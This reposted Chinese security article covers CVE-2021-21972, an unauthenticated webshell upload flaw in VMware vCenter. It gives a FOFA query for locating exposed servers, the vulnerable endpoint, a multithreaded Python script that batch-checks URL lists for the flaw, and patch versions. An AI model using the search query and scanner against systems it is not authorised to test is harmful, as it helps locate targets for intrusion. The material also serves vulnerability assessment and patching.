• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    关于Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题

    背景

    CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置,然后执行webshell即可。

    影响版本

    vmware:esxi:7.0/6.7/6.5
    vmware:vcenter_server:7.0/6.7/6.5

    漏洞复现 fofa查询

    语法:title="+ ID_VC_Welcome +"

    POC

    https://x.x.x.x/ui/vropspluginui/rest/services/uploadova

    使用https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC脚本批量验证

    #-*- coding:utf-8 -*-
    banner = """
        888888ba       dP           
        88  `8b      88           
        a88aaaa8P' .d8888b. d8888P .d8888b. dP  dP 
        88  `8b. 88' `88  88  Y8ooooo. 88  88 
        88  .88 88. .88  88     88 88. .88 
        88888888P `88888P8  dP  `88888P' `88888P' 
      ooooooooooooooooooooooooooooooooooooooooooooooooooooo 
            @time:2021/02/24 CVE-2021-21972.py
            C0de by NebulabdSec - @batsu         
     """
    print(banner)
    
    import threadpool
    import random
    import requests
    import argparse
    import http.client
    import urllib3
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    http.client.HTTPConnection._http_vsn = 10
    http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
    
    TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
    
    def get_ua():
      first_num = random.randint(55, 62)
      third_num = random.randint(0, 3200)
      fourth_num = random.randint(0, 140)
      os_type = [
        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
      ]
      chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
    
      ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
              '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
             )
      return ua
    
    def CVE_2021_21972(url):
      proxies = {"scoks5": "http://127.0.0.1:1081"}
      headers = {
        'User-Agent': get_ua(),
        "Content-Type": "application/x-www-form-urlencoded"
      }
      targetUrl = url + TARGET_URI
      try:
        res = requests.get(targetUrl,
                  headers=headers,
                  timeout=15,
                  verify=False,
                  proxies=proxies)
                  # proxies={'socks5': 'http://127.0.0.1:1081'})
        # print(len(res.text))
        if res.status_code == 405:
          print("[+] URL:{}--------存在CVE-2021-21972漏洞".format(url))
          # print("[+] Command success result: " + res.text + "\n")
          with open("存在漏洞地址.txt", 'a') as fw:
            fw.write(url + '\n')
        else:
          print("[-] " + url + " 没有发现CVE-2021-21972漏洞.\n")
      # except Exception as e:
      #   print(e)
      except:
        print("[-] " + url + " Request ERROR.\n")
    def multithreading(filename, pools=5):
      works = []
      with open(filename, "r") as f:
        for i in f:
          func_params = [i.rstrip("\n")]
          # func_params = [i] + [cmd]
          works.append((func_params, None))
      pool = threadpool.ThreadPool(pools)
      reqs = threadpool.makeRequests(CVE_2021_21972, works)
      [pool.putRequest(req) for req in reqs]
      pool.wait()
    
    def main():
      parser = argparse.ArgumentParser()
      parser.add_argument("-u",
                "--url",
                help="Target URL; Example:http://ip:port")
      parser.add_argument("-f",
                "--file",
                help="Url File; Example:url.txt")
      # parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
      args = parser.parse_args()
      url = args.url
      # cmd = args.cmd
      file_path = args.file
      if url != None and file_path ==None:
        CVE_2021_21972(url)
      elif url == None and file_path != None:
        multithreading(file_path, 10) # 默认15线程
    
    if __name__ == "__main__":
      main()

    EXP 修复建议

    vCenter Server7.0版本升级到7.0.U1c
    vCenter Server6.7版本升级到6.7.U3l
    vCenter Server6.5版本升级到6.5 U3n

    到此这篇关于关于Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题的文章就介绍到这了,更多相关Vmware vcenter上传漏洞内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

    上一篇:详解Tomcat双击startup.bat闪退的解决方法
    下一篇:Nginx的rewrite模块详解
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    关于Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题 关于,Vmware,vcenter,未,授权,